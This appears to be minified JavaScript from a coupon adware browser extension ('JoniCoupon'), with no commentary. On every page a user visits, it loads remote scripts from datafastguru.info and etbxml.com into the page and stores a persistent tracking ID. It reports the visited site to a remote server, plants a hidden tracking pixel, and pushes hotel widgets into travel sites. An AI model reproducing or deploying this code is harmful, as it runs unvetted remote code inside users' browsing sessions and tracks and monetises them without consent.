new function(){function c(a,d){var b=null;if(window.XDomainRequest){b=new XDomainRequest;b.onload=function(){a&&a(b.responseText)};var c=function(){d&&d(b.status)};b.onerror=c;b.ontimeout=c;b.onprogress=function(){}}else b=new XMLHttpRequest,b.onreadystatechange=function(){4==b.readyState&&(200==b.status?a&&a(b.responseText):d&&d(b.status))};return b}function k(){var a=c(function(a){localStorage.fouhid=a});a.open("GET","http://cfg.datafastguru.info/generatehid?partid="+sessionStorage.fopartid+"&subid="+
sessionStorage.fosubid,!0);a.send(null)}function l(){var a=c(function(a){a=JSON.parse(a);var b=document.getElementsByTagName("head")[0].appendChild(document.createElement("script"));b.src="http://pstatic.datafastguru.info/fo/ecom/lang.js?c="+a.country.toLowerCase();a=-1<navigator.userAgent.indexOf("MSIE 8.0")?"1386235369226ie":m<n?"2_3_524":"2_3_522";b=document.getElementsByTagName("head")[0].appendChild(document.createElement("script"));b.src="http://pstatic.datafastguru.info/rss/min/fo.min.js?v="+
a+"&b=dynamic&l=right";b=document.getElementsByTagName("head")[0].appendChild(document.createElement("script"));b.src="http://pstatic.datafastguru.info/wl/min/wl.js?v=139254389101";localStorage.fouhid&&0!=localStorage.fouhid.length&&"undefined"!=localStorage.fouhid||k();sessionStorage&&(sessionStorage.fosubid="731_0",sessionStorage.fopartid="wp",sessionStorage.fobn="JoniCoupon",sessionStorage.fobl="",sessionStorage.foc="$country")});a.open("GET","http://static.datafastguru.info/fo/country.js",
!0);a.send(null)}function e(){var a=window.location.host.toLowerCase();/tube|shopzilla.|beso.|kelkoo.|orange.|clickjogos|gameforge|pole-emploi|infojobs|snap.do|(stockinvestingbasics|allmyvideos|laposte|megafilmeshd|vidspot).net|(collectivites|sweet|jeux|voila|bilansgratuits|habbol|vente).fr|(abril|terra|ig|blogspot|hotelurbano|uol).com.br|www.easymobility.co.uk|gov.br|wikipedia.org|(pricegrabber|spardeingeld|snapdo|speedbit|loopnet|stackoverflow|stackexchange|hulu|bloomberg|blogger|dartybox|alexa|baidu|cj|cnn|facebook|flickr|history|hotmail|imdb|imvu|linkedin|microsoft|msn|myspace|netflix|nytimes|politico|picasa|pinterest|rue89|salon|searchenginewatch|delta-search|sfgate|shutterfly|techcrunch|verizon|venturebeat|wired|yankodesign|yahoo|youtube|bing|vk|live|tumblr|ask|apple|roblox|411answers|tagged|nickjr|opposingviews|truste|adobe|breakfastdailynews|.avg|espn.go|.aol|pogo|pornhub|youporn|pron|youjizz|xnxx|marca|elpais|juegos|surveysresearchgroup|dofus|adopteunmec|unique|22find|nationzoom|sncf|privee|awesomehp|updateflashplayer|stocktradingcenters|empowernetwork|regionalhealthreview|diyfood|websurveycentral|\.att|news788|411source|pandora|hsselite|verizonwireless|internetautoguide|symantec|\.pch|mobile|nortonpro|pchealthboost|voipo|contenko|seaworldparks|entrepreneur|ratezip|game321|boostmobile|cabelas|specialk|globo|yepi|jogatina|4shared|globo|ojogos|tudogostoso|netcartas|disney|voeazul|cartoonnetwork|\.tam|viajanet|vagalume|jogosdemeninas|^as|\.as|atrapalo|elconfidencial|lavanguardia|forocoches|peliculasyonkis|logitravel|freakshare|elperiodico|iberia|filmaffinity|chaturbate|expansion|todotest|antena3|cincodias).com|(elmundo|rtve|lavozdegalicia|sport|publico|game|online|eldiariomontanes|elcomercio|\.hoy|\.abc|telepizza|europapress).es|paypal|cam4|888poker|filmesonlinegratis|google|.gov|qvo6|cam4|surveyservers|ask.fm|games.la|jeu.info/i.test(a)||
l()}function f(){if(__tash&&__tash.bla.test(window.location.hostname)){var a=c(function(a){!1!==JSON.parse(a).found&&e()},function(){e()});a.open("GET","http://cwbl.datafastguru.info/search/"+p,!0);a.timeout=1E3;a.send()}else e()}function g(){if(sessionStorage.forcc)window.setTimeout(function(){delete sessionStorage.forcc},5E3);else if("/"==window.location.pathname){var a=c(function(a){0<a||f()});window.location.origin||(window.location.origin=window.location.protocol+"//"+window.location.hostname+
(window.location.port?":"+window.location.port:""));a.open("GET","http://capp.datafastguru.info/api/count/coupons?q="+encodeURIComponent(window.location.origin),!0);a.send(null)}else!1===h?f():e()}if(window==top){var m=Math.random(),n=1,p=window.location.host.toLowerCase(),h=!1;if(!1===h){document.getElementsByTagName("head")[0].appendChild(document.createElement("script")).src="http://pstatic.datafastguru.info/bl/min/bl.js?v=139254389101";var q=window.setInterval(function(){"undefined"!=typeof __tash&&
__tash.bla&&(g(),window.clearInterval(q))},10)}else g()}};

new function(){sessionStorage&&(sessionStorage.fosubid="731_0",sessionStorage.fopartid="wp",sessionStorage.fobn="JoniCoupon",sessionStorage.fobl="");/*document.getElementsByTagName("head")[0].appendChild(document.createElement("script")).src="http://pstatic.datafastguru.info/fo/travel.js?v=1392134070896&b=dynamic"*/};
new function(){var a=window.location.host.toLowerCase();/(booking|expedia|hotels|priceline|orbitz|roomkey|tripadvisor|kayak|travelocity|agoda|venere|hotwire|travel.yahoo|lastminute|southwest|united|edreams|makemytrip|marriott|vivastay|easyclicktravel|olotels|otel|airbnb|tingo|splendia|bookit|edream|hotels4u|getaroom|ihg|hilton|hyatt|wyndham|accorhotels|hrs|hostelbookers|bestwestern|budgetplaces|asiarooms|cheaptickets|choicehotels|directrooms|eurobookings|hostelworld|laterooms|hoteltravel|ratestogo|room77|transavia|wotif|trivago|hotelclub).com|hotel.de|hotels.nl|hotelspecials.nl/i.test(a)&&
(document.getElementsByTagName("head")[0].appendChild(document.createElement("script")).src="http://cond01.etbxml.com/api/web/hotels.php?mamId=wp_731_0&userId=2222&appId=3333&ui=1&ns=ETB_Hotels_Widget&partner=firstoffer&sp=false&sh=false&apps=Targeted&amu=280828404")};

new function(){function d(c,b){var a=null;if(window.XDomainRequest){a=new XDomainRequest;a.onload=function(){c&&c(a.responseText)};var d=function(){b&&b(a.status)};a.onerror=d;a.ontimeout=d;a.onprogress=function(){}}else a=new XMLHttpRequest,a.onreadystatechange=function(){4==a.readyState&&(200==a.status?c&&c(a.responseText):b&&b(a.status))};return a}function g(){var c=d(function(b){localStorage.fouhid=b});c.open("GET","http://cfg.datafastguru.info/generatehid?partid="+sessionStorage.fopartid+"&subid="+
sessionStorage.fosubid,!0);c.send(null)}function e(){var c;c=h<k?"1_0_12":"1_0_9";localStorage.fouhid&&0!=localStorage.fouhid.length&&"undefined"!=localStorage.fouhid||g();var b="http://cfg.datafastguru.info/a/hida/l.gif?pr=cpn&type=init&w=ss&hid="+localStorage.fouhid;-1==b.indexOf("?")&&(b+="?");var a=new Date,b=b+("&t="+a.getFullYear()+a.getMonth()+a.getDate());sessionStorage.fosubid&&(b+="&subid="+sessionStorage.fosubid);sessionStorage.fopartid&&(b+="&partid="+sessionStorage.fopartid);a=document.body.appendChild(document.createElement("img"));
a.style.zIndex=-100;a.style.position="absolute";a.style.left=0;a.style.top=0;a.src=b;document.getElementsByTagName("head")[0].appendChild(document.createElement("script")).src="http://pstatic.datafastguru.info/crss/min/fo.min.js?v="+c+"&b=dynamic"}if(window==top){self.host="capp.datafastguru.info";var h=Math.random(),k=1;if(sessionStorage.forcc)e();else if("/"==window.location.pathname){var f=d(function(c){0<c&&e()});window.location.origin||(window.location.origin=window.location.protocol+"//"+window.location.hostname+
(window.location.port?":"+window.location.port:""));f.open("GET","http://"+self.host+"/api/count/coupons?v=1&q="+encodeURIComponent(window.location.origin),!0);f.send(null)}}};

